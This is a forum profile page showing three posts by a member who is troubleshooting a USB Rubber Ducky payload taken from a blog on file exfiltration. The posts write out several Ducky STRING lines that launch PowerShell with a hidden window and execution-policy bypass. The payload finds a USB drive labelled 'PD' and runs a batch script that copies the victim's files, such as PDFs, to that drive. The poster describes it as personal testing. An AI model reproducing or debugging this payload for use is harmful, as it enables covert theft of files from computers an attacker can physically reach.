Jump to content

grahamjohnson77

Members
  • Posts

    3
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

grahamjohnson77's Achievements

Newbie

Newbie (1/14)

  1. This works directly from PS CLI: STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;" but not when run from ducky.
  2. BTW, all of the REMs are my attempts to try all different ways to get one to work. I have been online checking for suggestions too!
  3. All, I have started to learn the rubber ducky and followed the vblog on exfiltration of files from a system using the ducky. I built everything and all components are working except the initial drive find in PowerShell. Learning from vblog: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - Love these guys (shout out from Italy via Ireland!) For testing only (while I get more experience of the ducky), I have an external USB drive that I am using (e.g. F:\). That contains all the required files for d.bat. e.bat and the cscript i.vbs. Files are copied to slurp folder here. Then I plug in my rubber ducky to start the attack. That ducky script looks for the drive with Label "PD" (which is F:\) for the required d.bat to start the attack. Using my testing/debugging, I know that if I run the powershell cmd directly in a powershell CLI, the attack works no issues. Then, I can hard code the drive letter of F:\ and again, no issues. My slurp has the extracted pdf files. The only thing I can think it could be is the System is Locale Italian with Italian keyboard. But I am compiling it with ITALIAN encoder and works for other ways. REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "$u=gwmi win32_volume -Filter Label="`"PD"`";cd $u.Name;.\d.cmd" REM This one is working directly from Run -> Start!!! REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "F:\d.cmd" REM This one is working directly from Run -> Start!!! But Not Ducky! REM STRING powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'PD'}|select name;cd $u.name;.\d.cmd" REM This one is working but I don't want to hard code it obviously! Just to try and confirm is working as expected! REM STRING powershell -NoP -NonI -W H -Exec Bypass "e:\d.cmd" REM My latest attempt! Still no luck! STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;" ENTER I did see some errors about the select from win32_volume not valid etc. last night during troubleshooting so i think i would be seeing some PowerShell error if the string format was incorrect etc. Any ideas of how to troubleshoot this line only from the Rubber Ducky payload when Ducky is running? (again, I can put it into PowerShell directly and works!) STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;" Thank you.
×
×
  • Create New...